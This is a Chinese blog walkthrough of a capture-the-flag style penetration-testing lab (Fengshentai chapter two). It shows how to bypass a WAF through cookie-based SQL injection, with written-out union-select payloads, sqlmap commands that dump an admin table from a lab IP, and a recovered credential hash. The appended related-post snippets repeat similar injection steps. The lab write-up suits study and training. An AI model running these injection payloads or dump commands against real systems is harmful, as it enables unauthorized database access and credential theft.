封神台靶场-第二章

最新推荐文章于 2023-06-28 15:10:26 发布
最新推荐文章于 2023-06-28 15:10:26 发布
阅读量2.9k 收藏 14
点赞数 7
分类专栏: 封神台 封神台-第二章 文章标签: 渗透测试靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_helloword/article/details/107294184
版权

第二章:遇到阻难!绕过WAF过滤

1.查找有无sql注入点利用and 1=1发现做了过滤
在这里插入图片描述
使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10
在这里插入图片描述
2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过:
这里我们使用一个小工具进行注入(火狐插件)
在这里插入图片描述
这款工具可以自定义请求头响应头(Request header,Reponse header)
打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空格用+表示)
在这里插入图片描述
3.使用联合查询
这里我们做了猜测一般表名为admin,猜测尝试字段(admin,password,)

查询语句结果
id=1171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin查看回显
id=1171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin查询字段值

注意:这里id必须为假才会执行后面的语句
在这里插入图片描述
回显位置:2/3
在这里插入图片描述
3.字段值(admin:b9a2a2b5dffb918c)
在这里插入图片描述
4.用御剑后台扫描器扫描查找网站后台
在这里插入图片描述
5.登录后台拿到flag
在这里插入图片描述

kali-sqlmap

1.sqlmap cookie注入用法
sqlmap -u [url] --cokie [id=] --[table|dbs|columns] --level [2] --batch

sqlmap-cookie注入查询
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” --table --level 2查表
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” -T admin --columns --level 2指定表查字段
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” -T admin -C username,password --dump --level 2制定字段查值

1.查表
在这里插入图片描述
这里到查到一半出来了我就结束了在这里插入图片描述
2. 查字段
在这里插入图片描述
在这里插入图片描述
3. 查字段值
在这里插入图片描述
这里到查到一半出来了我就结束了
在这里插入图片描述

Mr H
关注
  • 7
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3416
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
神台 kali sqlmap 注入常见问题
weixin_49071539的博客
11-25 1257
sqlmap使用前,测试网页是否存在可注入漏洞: 1.寻找形如“.asp?id=xx”类的带参数的URL。 2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。 3.清空浏览器地址栏,输入“javascript:alert(document.cookie=“id=”+escape(“xx”));”,按Enter键后弹出一个对话框,内容是“id=xx”,然后用原来的URL刷新页面,如果显示正常,说明应用是用Request(“id”)这种方式获取数据的。 4.重复上面的步
神台靶场 kali训练营第二关WP
qq_54060725的博客
05-26 923
神台靶场 kali训练营第二关WP
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
登录别人的账户(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台靶场 - Kali系列
Hong__Cheng的博客
06-07 443
我在参考 旧目难忘 大佬的文章时。我看到接下来的操作时,有点懵逼了,这么复杂的嘛?不是就是要管理员密码?所以我直接就进入到phpstudy中去找果然,如图的三个文件,文件名中有admin的,我猜测这其中就有我想要的密码,直接下载下来。最近一直在打靶场,这个《Kali渗透 - Sqlmap实操靶场》搞了好久都没搞出来,在网上搜索教程也不多,但今天突然灵光一现找到的flag,特意发出来与大家分享,我也是初学者,耍了点小聪明,不过也算是成功了。我用的Notepad++依次打开这些文件,其中一个是这样的。
神台--第二章:遇到阻难!绕过WAF过滤!解题思路
04-12 5268
神台--第二章:遇到阻难!绕过WAF过滤!解题思路 一、查找sql注入点 进入测试页面http://59.63.200.79:8004/ 1)字符型、数字型等盲注尝试 随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下 网站对请求地址进行了WAF防护,通过测试没有过滤 ==order by、union== 网页防护一般只拦截get、post传参,因此尝试cookie注入 2)cookie注入 cookie注入提交的参数以cookie方式提交,判断步骤 1.找到...
神台靶场-尤里的复仇-第二章
weixin_58373549的博客
01-29 601
神台靶场-尤里的复仇-第二章:遇到阻难!绕过WAF过滤!【配套课时:SQL注入攻击原理 实战演练】
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 1129
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
封神演义--------------------.pdf
03-27
封神演义
更改支付金额(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
封神演义,-,第十二回,陈塘关哪吒出世.doc
09-16
封神演义,-,第十二回,陈塘关哪吒出世.doc
神台 第二章 绕过WAF
m0_65712192的博客
10-14 708
神台 第二章 利用ModHeader绕过WAF
mbp 封神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
sqlmap的使用 (以封神台题目为例)
yangtailang94666的博客
10-11 1301
一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL --data=DATA 数据字符串通过POST发送 --cookie=COOKIE HTTP Cookie的值 ...
神台第二关
weixin_44106116的博客
11-21 2142
1第一种方法 1 查看是否能够SQL注入 点开第一个新闻,用and 1=1 查看是否存在SQL注入,发现弹出禁用参数对话框 再使用order by ,查看共有几个字段,发现order by 可以用,共十个 因为网页的防护,一般只拦截GET和POST,忽略了cookie也可以传参。所以尝试cookie注入 1.1附加知识点 cookie 类型为“小型文本文件”,是网站给客户端的身份证,由客户端暂时或...
第二章:遇到阻难!绕过WAF过滤!【SQL注入攻击】
野马菲比的博客
07-21 1022
爆破andexists(select*from表名),如果页面返回正常,就存在这个表。exists这个函数就是检查子查询能否查询到数据,如果能会返回一个True。靶场http//kypt8004.ia.aqlab.cn/根据md5的特征,猜测为md5加密;解密为welcome。1、判断是否存在注入,发现有过滤。说明存在admin表。如果不知道字段怎么办?就一个库,无需知道。...
c4d修神记:零基础到三维封神 下载
01-05
"c4d修神记:零基础到三维封神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值